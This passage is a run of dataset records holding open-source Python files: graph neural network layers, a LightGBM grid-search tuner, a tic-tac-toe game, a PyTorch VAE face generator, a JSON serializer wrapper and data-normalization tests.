None:\n sc_2 += s_bias2\n\n logits = torch.cat((sc_1, sc_2), 0).squeeze(-1)\n v = logits.shape[0]\n\n return logits, logits[:v//2]\n\n\nclass GraphCrossnet(nn.Module):\n def __init__(self, ks, in_dim, out_dim, dim=48, cross_weight=1.0, fuse_weight=1.0, R=1, cross_layer=2):\n super(GraphCrossnet, self).__init__()\n self.ks = ks\n self.cs_w = cross_weight\n self.fs_w = fuse_weight\n self.cs_l = cross_layer\n\n self.start_gcn_s1 = GCN(in_dim, dim)\n self.start_gcn_s2 = GCN(dim, dim)\n self.end_gcn = GCN(2*dim, out_dim)\n\n self.index_select_s1 = IndexSelect(ks[0], dim, act='prelu', R=R)\n self.index_select_s2 = IndexSelect(ks[1], dim, act='prelu', R=R)\n self.pool_s12_start = GraphPool(dim)\n self.pool_s23_start = GraphPool(dim)\n self.unpool_s21_end = GraphUnpool(dim)\n self.unpool_s32_end = GraphUnpool(dim)\n\n self.s1_l1 = GCN(dim, dim)\n self.s1_l2 = GCN(dim, dim)\n self.s1_l3 = GCN(dim, dim)\n self.s2_l1 = GCN(dim, dim)\n self.s2_l2 = GCN(dim, dim)\n self.s2_l3 = GCN(dim, dim)\n self.s3_l1 = GCN(dim, dim)\n self.s3_l2 = GCN(dim, dim)\n self.s3_l3 = GCN(dim, dim)\n\n if self.cs_l>=1:\n self.pool_s12_1 = GraphPool(dim, g=True)\n self.unpool_s21_1 = GraphUnpool(dim)\n self.pool_s23_1 = GraphPool(dim, g=True)\n self.unpool_s32_1 = GraphUnpool(dim)\n if self.cs_l>=2:\n self.pool_s12_2 = GraphPool(dim, g=True)\n self.unpool_s21_2 = GraphUnpool(dim)\n self.pool_s23_2 = GraphPool(dim, g=True)\n self.unpool_s32_2 = GraphUnpool(dim)\n\n def forward(self, A, x):\n\n A_s1 = A\n x_s1 = self.start_gcn_s1(A_s1, x)\n x_org = x_s1\n x_s1_ = torch.zeros_like(x_s1)\n x_s1_ = x_s1[torch.randperm(x_s1.shape[0]),:]\n ret_s1, value_s1, idx_s1, idx_s1_, Xdown_s1 = self.index_select_s1(x_s1, x_s1_, A_s1) \n x_s2, A_s2 = self.pool_s12_start(A_s1, x_s1, idx_s1, idx_s1_, value_s1, initlayer=True)\n\n x_s2 = self.start_gcn_s2(A_s2, x_s2)\n x_s2_ = torch.zeros_like(x_s2)\n x_s2_ = x_s2[torch.randperm(x_s2.shape[0]),:]\n ret_s2, value_s2, idx_s2, idx_s2_, Xdown_s2 = self.index_select_s2(x_s2, x_s2_, A_s2)\n x_s3, A_s3 = self.pool_s23_start(A_s2, x_s2, idx_s2, idx_s2_, value_s2, initlayer=True)\n\n res_s1_0, res_s2_0, res_s3_0 = x_s1, x_s2, x_s3\n\n x_s1 = self.s1_l1(A_s1, x_s1, F.relu)\n x_s2 = self.s2_l1(A_s2, x_s2, F.relu)\n x_s3 = self.s3_l1(A_s3, x_s3, F.relu)\n\n res_s1_1, res_s2_1, res_s3_1 = x_s1, x_s2, x_s3\n\n if self.cs_l >= 1:\n x_s12_fu = self.pool_s12_1(A_s1, x_s1, idx_s1, idx_s1_, value_s1)\n x_s21_fu = self.unpool_s21_1(A_s1, x_s2, idx_s1)\n x_s23_fu = self.pool_s23_1(A_s2, x_s2, idx_s2, idx_s2_, value_s2)\n x_s32_fu = self.unpool_s32_1(A_s2, x_s3, idx_s2)\n\n x_s1 = x_s1 + self.cs_w * x_s21_fu + res_s1_0\n x_s2 = x_s2 + self.cs_w * (x_s12_fu + x_s32_fu)/2 + res_s2_0\n x_s3 = x_s3 + self.cs_w * x_s23_fu + res_s3_0\n\n x_s1 = self.s1_l2(A_s1, x_s1, F.relu)\n x_s2 = self.s2_l2(A_s2, x_s2, F.relu)\n x_s3 = self.s3_l2(A_s3, x_s3, F.relu)\n\n if self.cs_l >= 2:\n x_s12_fu = self.pool_s12_2(A_s1, x_s1, idx_s1, idx_s1_, value_s1)\n x_s21_fu = self.unpool_s21_2(A_s1, x_s2, idx_s1)\n x_s23_fu = self.pool_s23_2(A_s2, x_s2, idx_s2, idx_s2_, value_s2)\n x_s32_fu = self.unpool_s32_2(A_s2, x_s3, idx_s2)\n\n x_s1 = x_s1 + self.cs_w * 0.05 * x_s21_fu\n x_s2 = x_s2 + self.cs_w * 0.05 * (x_s12_fu + x_s32_fu)/2\n x_s3 = x_s3 + self.cs_w * 0.05 * x_s23_fu\n\n x_s1 = self.s1_l3(A_s1, x_s1, F.relu)\n x_s2 = self.s2_l3(A_s2, x_s2, F.relu)\n x_s3 = self.s3_l3(A_s3, x_s3, F.relu)\n \n x_s3_out = self.unpool_s32_end(A_s2, x_s3, idx_s2) + Xdown_s2\n x_s2_out = self.unpool_s21_end(A_s1, x_s2 + x_s3_out, idx_s1)\n x_agg = x_s1 + x_s2_out * self.fs_w + Xdown_s1 * self.fs_w\n x_agg = torch.cat([x_agg, x_org], 1)\n x_agg = self.end_gcn(A_s1, x_agg)\n\n return x_agg, ret_s1, ret_s2\n\n\nclass IndexSelect(nn.Module):\n\n def __init__(self, k, n_h, act, R=1):\n super().__init__()\n self.k = k\n self.R = R\n self.sigm = nn.Sigmoid()\n self.fc = MLP(n_h, n_h, act)\n self.disc = Discriminator(n_h)\n self.gcn1 = GCN(n_h, n_h)\n\n def forward(self, seq1, seq2, A, samp_bias1=None, samp_bias2=None):\n h_1 = self.fc(seq1)\n h_2 = self.fc(seq2)\n h_n1 = self.gcn1(A, h_1)\n\n X = self.sigm(h_n1)\n ret, ret_true = self.disc(X, h_1, h_2, samp_bias1, samp_bias2)\n scores = self.sigm(ret_true).squeeze()\n num_nodes = A.shape[0]\n values, idx = torch.topk(scores, int(num_nodes))\n values1, idx1 = values[:int(self.k*num_nodes)], idx[:int(self.k*num_nodes)]\n values0, idx0 = values[int(self.k*num_nodes):], idx[int(self.k*num_nodes):]\n\n return ret, values1, idx1, idx0, h_n1\n\n\nclass GraphPool(nn.Module):\n\n def __init__(self, in_dim, g=False):\n super(GraphPool, self).__init__()\n self.g = g\n if self.g:\n self.down_gcn = GCN(in_dim, in_dim)\n \n def forward(self, A, X, idx, idx_=None, value=None, initlayer=False):\n if self.g:\n X = self.down_gcn(A, X)\n\n new_x = X[idx,:]\n score = torch.unsqueeze(value, -1)\n new_x = torch.mul(new_x, score)\n\n if initlayer:\n A = self.removeedge(A, idx)\n return new_x, A\n else:\n return new_x\n\n def removeedge(self, A, idx):\n A_ = A[idx,:]\n A_ = A_[:,idx]\n return A_\n\n \n\nclass GraphUnpool(nn.Module):\n\n def __init__(self, in_dim):\n super(GraphUnpool, self).__init__()\n self.up_gcn = GCN(in_dim, in_dim)\n\n def forward(self, A, X, idx):\n\n new_X = torch.zeros([A.shape[0], X.shape[1]]).to(X.device)\n new_X[idx] = X\n new_X = self.up_gcn(A, new_X)\n return new_X","repo_name":"limaosen0/GXN","sub_path":"ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":10385,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"18"}
+{"seq_id":"22483337693","text":"\r\n\r\n# 使用网格搜索方法 确定lgbm的参数值\r\nfrom lightgbm import LGBMClassifier\r\nimport lightgbm as lgb\r\nfrom toad.metrics import KS, F1, AUC\r\n\r\nfrom sklearn.metrics import roc_curve\r\nimport pandas as pd\r\nimport numpy as np\r\nimport logging\r\nfrom pyecharts import options as opts\r\nfrom pyecharts.charts import Bar, Grid, Line\r\n# 日志管理\r\nlogger_name = \"lgbm\"\r\nlogger = logging.getLogger(logger_name)\r\nlogger.setLevel(logging.DEBUG)\r\nlogger.info('test')\r\n\r\n# 使用网格搜索方法 确定lgbm的参数值\r\n\r\ndef init_feature(x_train, y_train):\r\n X, Y = x_train, y_train\r\n lgbm_model = LGBMClassifier(\r\n learning_rate=0.05,\r\n n_estimators=500,\r\n max_depth=4,\r\n min_split_gain=0.01,\r\n min_child_samples=20,\r\n subsample=1,\r\n colsample_bytree=1,\r\n importance_type='split',\r\n objective='binary',\r\n random_state=7)\r\n\r\n lgbm_param = lgbm_model.get_params()\r\n lgbm_train = lgb.Dataset(X, Y)\r\n lgbm_param.pop('silent')\r\n lgbm_param.pop('n_estimators')\r\n\r\n '''使用交叉验证的方式确定最优的树数量'''\r\n cvresult = lgb.cv(lgbm_param, lgbm_train, num_boost_round=100, nfold=4, metrics=['auc','binary_logloss'], early_stopping_rounds=100)\r\n best_n_estimators = len(cvresult['auc-mean'])\r\n print('确定最优的树数量', best_n_estimators)\r\n\r\n lgbm_model.set_params(n_estimators=best_n_estimators)\r\n # lgbm_model.fit(X,Y,eval_metric='auc')\r\n lgbm_model.fit(X, Y, eval_metric=['auc', 'binary_logloss'])\r\n\r\n feat_imp = pd.Series(lgbm_model.feature_importances_, index=X.columns)\r\n feat_imp = feat_imp.sort_values(ascending=False)\r\n\r\n valid_feature_num = len(np.where(feat_imp > 0)[0]) # 有效变量是有feature_importance的变量(在lgbm树模型中有贡献的变量,其他的变量没有用到)\r\n print('有效变量数为{0}个'.format(valid_feature_num))\r\n\r\n return feat_imp\r\n\r\n\r\n\r\n# from sklearn import svm, datasets\r\n# from sklearn.model_selection import GridSearchCV\r\n# iris = datasets.load_iris()\r\n# parameters = {'kernel':('linear', 'rbf'), 'C':[1, 10]}\r\n# svc = svm.SVC()\r\n# clf = GridSearchCV(svc, parameters,scoring='roc_auc',cv=4)\r\n# clf.fit(iris.data[0:100], iris.target[0:100])\r\nparameters={'num_leaves':[i for i in range(10,50,1)],\r\n 'max_depth':[2,3,4,5,6],\r\n 'learning_rate':[0.001,0.003,0.005]+[i/100 for i in range(1,11)],\r\n 'n_estimators':range(100,500,2),\r\n 'min_split_gain':[i/100 for i in range(0,10,1)],\r\n 'min_child_weight':[0.001,0.003,0.005,0.01,0.02,0.03,0.04,0.05,0.06,0.07,0.08,0.09],\r\n 'min_child_samples':[i for i in range(10,50,1)],\r\n 'subsample':[i/10 for i in range(6,11)],\r\n 'colsample_bytree':[i/10 for i in range(6,11)],\r\n 'reg_alpha':[i/100 for i in range(0,200,1)],\r\n 'reg_lambda':[i/10 for i in range(70,200,1)]\r\n }\r\n\r\ndef grid_search(parameters,x_train, x_test, y_train, y_test):\r\n best_auc = 0\r\n for num_leaves in parameters['num_leaves']:\r\n for max_depth in parameters['max_depth']:\r\n for learning_rate in parameters['learning_rate']:\r\n for n_estimators in parameters['n_estimators']:\r\n # for min_split_gain in parameters['min_split_gain']:\r\n # for min_child_weight in parameters['min_child_weight']:\r\n # for min_child_samples in parameters['min_child_samples']:\r\n # for subsample in parameters['subsample']:\r\n # for colsample_bytree in parameters['colsample_bytree']:\r\n # for reg_alpha in parameters['reg_alpha']:\r\n # for reg_lambda in parameters['reg_lambda']:\r\n # logger.info('{},{},{},{},{},{},{},{},{},{},{}'.format(num_leaves,\r\n # max_depth,\r\n # learning_rate,\r\n # n_estimators,\r\n # min_split_gain,\r\n # min_child_weight,\r\n # min_child_samples,\r\n # subsample,\r\n # colsample_bytree,\r\n # reg_alpha,\r\n # reg_lambda\r\n # ))\r\n lgbm_model = LGBMClassifier(\r\n num_leaves=num_leaves,\r\n max_depth=max_depth,\r\n learning_rate=learning_rate,\r\n n_estimators=n_estimators,\r\n # min_split_gain=min_split_gain,\r\n # min_child_weight=min_child_weight,\r\n # min_child_samples=min_child_samples,\r\n # subsample=subsample,\r\n # colsample_bytree=colsample_bytree,\r\n # reg_alpha=reg_alpha,\r\n # reg_lambda=reg_lambda,\r\n importance_type='split',\r\n objective='binary',\r\n random_state=7)\r\n\r\n lgbm_model.fit(x_train, y_train, eval_metric='auc')\r\n preds = lgbm_model.predict(x_test)\r\n auc = AUC(preds,y_test)\r\n if auc>best_auc:\r\n best_auc = auc\r\n logger.info('test auc:{}'.format(best_auc))\r\n best_para = lgbm_model.get_params()\r\n return best_para\r\n\r\n\r\n\r\ndef py_overlap(feature,cut_list,train_cnt_rate,oot_cnt_rate,train_due_rate,oot_due_rate):\r\n bar = (\r\n Bar()\r\n .add_xaxis([ str(i) for i in cut_list])\r\n .add_yaxis(\r\n \"train_rate\",\r\n list(train_cnt_rate.values.round(2)), gap=\"0%\", category_gap=\"40%\",\r\n yaxis_index=0,)\r\n .add_yaxis(\r\n \"oot_rate\",\r\n list(oot_cnt_rate.values.round(2)), gap=\"0%\", category_gap=\"40%\",\r\n yaxis_index=0,)\r\n .set_global_opts(\r\n title_opts=opts.TitleOpts(title=feature),\r\n yaxis_opts=opts.AxisOpts(axislabel_opts=opts.LabelOpts(formatter=\"{value} %\"), position=\"right\", ),\r\n )\r\n\r\n )\r\n\r\n line = (\r\n Line()\r\n .add_xaxis([ str(i) for i in cut_list])\r\n .add_yaxis(\r\n \"train_due\",\r\n train_due_rate.values.round(2),\r\n yaxis_index=0,)\r\n .add_yaxis(\r\n \"oot_due\",\r\n oot_due_rate.values.round(2),\r\n yaxis_index=0,)\r\n )\r\n\r\n overlap_1 = bar.overlap(line)\r\n overlap_1.render_notebook()\r\n return overlap_1\r\n\r\n\r\n\r\n\r\n\r\ndef xw_bar(feature,cut_list,train_cnt_rate,oot_cnt_rate):\r\n bar = (\r\n Bar()\r\n .add_xaxis(cut_list)\r\n .add_yaxis(\r\n \"train\",\r\n list(train_cnt_rate.values.round(2)), gap=\"0%\", category_gap=\"40%\",\r\n yaxis_index=0,)\r\n .add_yaxis(\r\n \"oot\",\r\n list(oot_cnt_rate.values.round(2)), gap=\"0%\", category_gap=\"40%\",\r\n yaxis_index=0,)\r\n .set_global_opts(\r\n title_opts=opts.TitleOpts(title=feature),\r\n yaxis_opts=opts.AxisOpts(axislabel_opts=opts.LabelOpts(formatter=\"{value} %\"), position=\"right\", ),\r\n )\r\n\r\n )\r\n return bar\r\n\r\n\r\n\r\ndef xw_line(feature,cut_list,train_due_rate,oot_due_rate):\r\n line = (\r\n Line()\r\n .add_xaxis(cut_list)\r\n .add_yaxis(\r\n \"train\",\r\n list(train_due_rate.values.round(2)),\r\n yaxis_index=0,)\r\n .add_yaxis(\r\n \"oot\",\r\n list(oot_due_rate.values.round(2)),\r\n yaxis_index=0,)\r\n .set_global_opts(\r\n title_opts=opts.TitleOpts(title=feature),\r\n yaxis_opts=opts.AxisOpts(axislabel_opts=opts.LabelOpts(formatter=\"{value}\"), position=\"right\", ),\r\n )\r\n\r\n )\r\n return line\r\n\r\n","repo_name":"xingweihappyer/credit-card","sub_path":"lgbm_tuner.py","file_name":"lgbm_tuner.py","file_ext":"py","file_size_in_byte":9511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"40309053165","text":"from print_board import *\nfrom random import randrange\nfrom functools import partial\ntext = partial(print, sep='', end=\"\\n\\n\")\n\ndef play(board, turn, u_icon, b_icon, round, bot):\n\n choice = ''\n\n print_board(board, round)\n\n if turn == \"user\":\n\n good = False\n while not good:\n good = True\n text(bot,\": Your turn! Which place (0-8) would you like to play?\")\n choice = input(\"--> \")\n if choice not in board or (choice == 'X' or choice == 'O' or not choice):\n text(bot,\": That's not an option, sorry.\")\n good = False\n\n board[board.index(choice)] = u_icon\n \n else:\n \n while choice not in board: # while choice is not an option\n choice = str(randrange(0,8)) # generate choice (0-8)\n text(bot,\": My turn! I'll pick... \",choice,\"!\")\n\n board[board.index(choice)] = b_icon\n\n return check_for_win(board)\n\ndef check_for_win(board):\n\n # check for horizontal win\n i = 0\n while i < 9: # look through rows 0-2, 3-5, and 6-8\n if board[i] == board[i + 1] and board[i] == board[i + 2]:\n return board[i]\n i += 3\n\n # check for vertical win\n i = 0\n while i < 3: # look through columns 0;3;6, 1;4;7, and 2;5;8\n if board[i] == board[i + 3] and board[i] == board[i + 6]:\n return board[i]\n i += 1\n\n # check for diagonal win\n if board[0] == board[4] and board[0] == board[8]:\n return board[0]\n elif board[2] == board[4] and board[2] == board[6]:\n return board[2]\n\n for b in board:\n if b is not 'X' and b is not 'O':\n return '' # return blank if no winner yet and there are still open spaces\n\n return 'C' # return C if no winner yet and there are NOT still open spaces","repo_name":"meganmcadams/tik-tac-toe","sub_path":"Sources/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"7021341509","text":"# -*- encoding: utf-8 -*-\n'''\n@Author : {Yixu}\n@Contact : {xiyu111@mail.ustc.edu.cn}\n@Software: PyCharm\n@File : VAE_Genarate_face.py\n@Time : 6/11/2019 7:05 PM\n'''\n'''\nuse gan is not good,this time use vae,may use fullconnect to de\n'''\n\nfrom read_data import read_img\nfrom torch.utils.data import DataLoader\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nfrom torchvision.utils import save_image\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport os\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1,2,3,4,5\"\n\n\nclass VAE_net(torch.nn.Module):\n\tdef __init__(self):\n\t\tsuper(VAE_net, self).__init__() # jiche fathers Attribute\n\t\tlatent_size = 64\n\t\tn_channel = 3\n\t\tn_feature = 128\n\t\tLATENT_CODE_NUM = 64 # for VAE latne\n\n\t\tself.Decoder_net = nn.Sequential(nn.ConvTranspose2d(latent_size, 4 * n_feature, kernel_size=4, bias=False),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(4 * n_feature), # input 64*1*1\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(4 * n_feature, 2 * n_feature, kernel_size=4, padding=1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tstride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbias=False),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(2 * n_feature),\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(2 * n_feature, n_feature, kernel_size=4, padding=1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tstride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbias=False),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(n_feature),\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(n_feature, n_feature // 2, kernel_size=4, stride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding=1),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(n_feature // 2),\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(n_feature // 2, n_feature // 4, kernel_size=4, stride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding=1),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(n_feature // 4),\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(n_feature // 4, n_channel, kernel_size=4, stride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding=1),\n\t\t\t\t\t\t\t\t\t\t nn.Sigmoid(), # output 3*128*128\n\t\t\t\t\t\t\t\t\t\t ).cuda()\n\n\t\tself.Encoder_cal_u = nn.Linear(64 * 1 * 1, LATENT_CODE_NUM).cuda()\n\t\tself.Encoder_cal_o = nn.Linear(64 * 1 * 1, LATENT_CODE_NUM).cuda()\n\t\tself.Encoder_cal_add_u_o = nn.Linear(LATENT_CODE_NUM, 64 * 1 * 1).cuda() #???\n\n\t\tself.Encoder_net = nn.Sequential(\n\t\t\tnn.Conv2d(n_channel, n_feature, kernel_size=4, stride=2, padding=1, bias=False),\n\t\t\tnn.BatchNorm2d(n_feature), # input 128*128*3\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(n_feature, 2 * n_feature, kernel_size=4, stride=2, padding=1, bias=False),\n\t\t\tnn.BatchNorm2d(2 * n_feature),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(2 * n_feature, 4 * n_feature, kernel_size=4, stride=2, padding=1,\n\t\t\t\t\t bias=False),\n\t\t\tnn.BatchNorm2d(4 * n_feature),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(4 * n_feature, 2 * n_feature, kernel_size=4, stride=2, padding=1,\n\t\t\t\t\t bias=False),\n\t\t\tnn.BatchNorm2d(2 * n_feature),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(2 * n_feature, 1 * n_feature, kernel_size=4, stride=2, padding=1,\n\t\t\t\t\t bias=False),\n\t\t\tnn.BatchNorm2d(1 * n_feature),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(1 * n_feature, LATENT_CODE_NUM, kernel_size=4), # output 64 * 1 * 1\n\t\t).cuda()\n\n\tdef reparameterize(self, mu, logvar):\n\t\teps = torch.randn(mu.size(0), mu.size(1)).cuda() #\n\t\tz = mu + eps * torch.exp(logvar / 2)\n\t\treturn z.cuda()\n\n\tdef forward(self, img):\n\t\tpred1, pred2 = self.Encoder_net(img), self.Encoder_net(img)\n\t\tmu = self.Encoder_cal_u(pred1.view(pred1.size(0), -1)) # get\n\t\tlogvar = self.Encoder_cal_o(pred2.view(pred2.size(0), -1)) # get\n\t\tz = self.reparameterize(mu, logvar)\n\t\tadd_u_o = self.Encoder_cal_add_u_o(z).view(z.size(0), 64, 1, 1)\n\t\toutput = self.Decoder_net(add_u_o) # get\n\t\treturn output.cuda(), mu.cuda(), logvar.cuda()\n\nvae = VAE_net()\n\nif torch.cuda.device_count() > 1:\n\tvae = nn.DataParallel(vae)\n\tvae = vae.cuda()\n\ndef loss_func(recon_x, x, mu, logvar):\n\t# BCE = F.binary_cross_entropy(recon_x, x, size_average=False)\n\t# KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n\t# return BCE + KLD\n\tcriterion = torch.nn.MSELoss()\n\tl2_loss = criterion(recon_x, x)\n\tKLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n\treturn l2_loss + KLD\n\n# Parallel Computing\n\noptimizer = torch.optim.Adam(vae.parameters(), lr=0.001, betas=(0.9, 0.999), eps=1e-08, weight_decay=0)\n\nif __name__ == '__main__':\n\tfile_dir = \"/home1/yixu/yixu_project/CVAE-GAN/download_script/download\"\n\tdevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\tcuda = True if torch.cuda.is_available() else False\n\tTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor # ????\n\tdata = read_img.get_file(file_dir)\n\tdata = data.to(device)\n\n\tdataloader = DataLoader(data, batch_size=64, shuffle=True)\n\n\n\t# for this time decoder is genarate\n\t# (self, in_channels, out_channels, kernel_size, stride=1,padding=0, output_padding=0, groups=1, bias=True,dilation=1, padding_mode='zeros'):\n\t# output=(input-1)*stride+output_padding -2*padding+kernel_size\n\n\t# not same as up\n\t# output=(input-kernel_size+2*Padding)/stride + 1\n\n\tdef weights_init(m):\n\t\tif type(m) in [nn.ConvTranspose2d, nn.Conv2d]:\n\t\t\tnn.init.xavier_normal_(m.weight)\n\t\telif type(m) == nn.BatchNorm2d:\n\t\t\tnn.init.normal(m.weight, 1.0, 0.02)\n\t\t\tnn.init.constant_(m.bias, 0)\n\t\telif type(m) == nn.Linear:\n\t\t\tnn.init.normal(m.weight, 1.0, 0.02)\n\t\t\tnn.init.constant_(m.bias, 0)\n\n\n\t#\n\t#vae.Decoder_net.apply(weights_init)\n\t#vae.Encoder_net.apply(weights_init)\n\t#vae.Encoder_cal_add_u_o.apply(weights_init) # ???\n\t#vae.Encoder_cal_o.apply(weights_init)\n\t#vae.Encoder_cal_u.apply(weights_init)\n\n\tfixed_noise = torch.randn(64, 64, 1, 1).cuda() # fix it as one\n\tepoch_num = 4000\n\n\tfor epoch in range(epoch_num):\n\t\tfor batch_idx, data in enumerate(dataloader):\n\t\t\t# get data\n\t\t\timg = data.cuda()\n\t\t\tbatch_size = img.size(0)\n\t\t\ttotal_loss = 0\n\t\t\toptimizer.zero_grad()\n\t\t\trecon_img, mu, logvar = vae.forward(img)\n\n\t\t\tloss = loss_func(recon_img, img, mu, logvar)\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\n\t\t\tif batch_idx == 1:\n\t\t\t\t#fake_img = vae.Decoder_net(fixed_noise).cuda()\n\t\t\t\tfake_img = vae.module.Decoder_net(fixed_noise).cuda()\n\t\t\t\t# path = '/home1/yixu/yixu_project/CVAE-GAN/output_VAE/images_epoch{:02d}_batch{:03d}.jpg'.format(epoch,batch_idx)\n\t\t\t\tpath = '/home1/yixu/yixu_project/CVAE-GAN/output_VAE_l2loss/images_epoch{:02d}_batch{:03d}.jpg'.format(\n\t\t\t\t\tepoch, batch_idx)\n\t\t\t\tsave_image(fake_img, path, normalize=True)\n\n\t\t\tprint('[{}/{}]'.format(epoch, epoch_num) +\n\t\t\t\t '[{}/{}]'.format(batch_idx, len(dataloader)) +\n\t\t\t\t 'loss:{:g}'.format(loss))\n","repo_name":"MasterXiYu/CVAE-GAN","sub_path":"demo/VAE_Genarate_face.py","file_name":"VAE_Genarate_face.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"}
+{"seq_id":"27946305433","text":"try:\n import ujson as json\nexcept BaseException:\n import json\nfrom .SerializerBase import SerializerBase\n\n\nclass SerializerUJson(SerializerBase):\n\n def dumps(self, obj, sort_keys=False, indent=False):\n return json.dumps(obj, ensure_ascii=False, sort_keys=sort_keys, indent=indent)\n\n def loads(self, s):\n if isinstance(s, bytes):\n s = s.decode('utf-8')\n return json.loads(s)\n","repo_name":"ahussein/core9","sub_path":"JumpScale9/data/serializers/SerializerUJson.py","file_name":"SerializerUJson.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"39271514878","text":"import torch\nimport torch.nn as nn\n\nfrom modules.conv_layer import GraphConv\nfrom modules.attention import AttentionLayer\nimport pdb\n\n\nclass MolConvNet(nn.Module):\n def __init__(self, args, use_attn=False):\n super(MolConvNet, self).__init__()\n self.args = args\n self.use_attn = use_attn\n\n self.conv_layer = GraphConv(args)\n self.output_size = args.hidden_size\n\n if self.use_attn:\n self.attn_layer = AttentionLayer(args)\n self.output_size += args.hidden_size\n\n def forward(self, mol_graph, stats_tracker=None):\n graph_inputs, scope = mol_graph.get_graph_inputs()\n atom_h = self.conv_layer(graph_inputs)\n\n attn_context = None\n if self.use_attn:\n attn_context = self.attn_layer(atom_h, scope)\n if attn_context is not None:\n atom_h = torch.cat([atom_h, attn_context], dim=1)\n\n return atom_h\n","repo_name":"benatorc/PA-Graph-Transformer","sub_path":"models/mol_conv_net.py","file_name":"mol_conv_net.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"18"}
+{"seq_id":"18717421157","text":"\"\"\"Tests for normalization functions.\"\"\"\nimport sqlite3\nfrom . import _unittest as unittest\nfrom datatest.requirements import BaseRequirement\nfrom datatest._utils import IterItems\n\nfrom datatest._normalize import TypedIterator\nfrom datatest._normalize import _normalize_lazy\nfrom datatest._normalize import _normalize_eager\nfrom datatest._normalize import normalize\n\ntry:\n import squint\nexcept ImportError:\n squint = None\n\ntry:\n import pandas\nexcept ImportError:\n pandas = None\n\ntry:\n import numpy\nexcept ImportError:\n numpy = None\n\n\nclass TestNormalizeLazyUnchanged(unittest.TestCase):\n \"\"\"Test objects that should be returned unchanged.\"\"\"\n def test_nonexhaustible_iterable(self):\n data = [1, 2, 3]\n self.assertIs(_normalize_lazy(data), data)\n\n data = (1, 2, 3)\n self.assertIs(_normalize_lazy(data), data)\n\n def test_exhaustible_iterator(self):\n data = iter([1, 2, 3])\n self.assertIs(_normalize_lazy(data), data)\n\n def test_typediterator(self):\n data = TypedIterator(iter([1, 2, 3]), evaltype=tuple)\n self.assertIs(_normalize_lazy(data), data)\n\n\n@unittest.skipUnless(squint, 'requires squint')\nclass TestNormalizeLazySquint(unittest.TestCase):\n \"\"\"Test squint package's `Result` and `Query` objects.\"\"\"\n def test_sequence_result(self):\n result_object = squint.Result([1, 2, 3, 4], evaltype=list)\n normalized = _normalize_lazy(result_object)\n self.assertIs(normalized, result_object, msg='should return original object')\n\n def test_iteritems_result(self):\n result_object = squint.Result([('a', 1), ('b', 2)], evaltype=dict)\n normalized = _normalize_lazy(result_object)\n self.assertIsInstance(normalized, IterItems)\n self.assertEqual(set(normalized), set([('a', 1), ('b', 2)]))\n\n def test_query_that_returns_sequence(self):\n query_object = squint.Query.from_object([1, 2, 3, 4])\n normalized = _normalize_lazy(query_object)\n self.assertIsInstance(normalized, squint.Result)\n self.assertEqual(normalized.evaltype, list)\n\n def test_query_that_returns_noncontainer(self):\n query_object = squint.Query.from_object([1, 2, 3, 4]).sum()\n normalized = _normalize_lazy(query_object)\n self.assertEqual(normalized, 10)\n\n def test_query_that_returns_mapping(self):\n query_object = squint.Query.from_object({'a': 1, 'b': 2})\n normalized = _normalize_lazy(query_object)\n self.assertIsInstance(normalized, IterItems)\n self.assertEqual(set(normalized), set([('a', 1), ('b', 2)]))\n\n def test_select(self):\n \"\"\"Select objects should not be changed by normalization.\"\"\"\n select_object = squint.Select([['A'], [1], [2], [3], [4]])\n normalized = _normalize_lazy(select_object)\n self.assertIsInstance(normalized, squint.Select)\n\n\n@unittest.skipUnless(pandas, 'requires pandas')\nclass TestNormalizeLazyPandas(unittest.TestCase):\n def 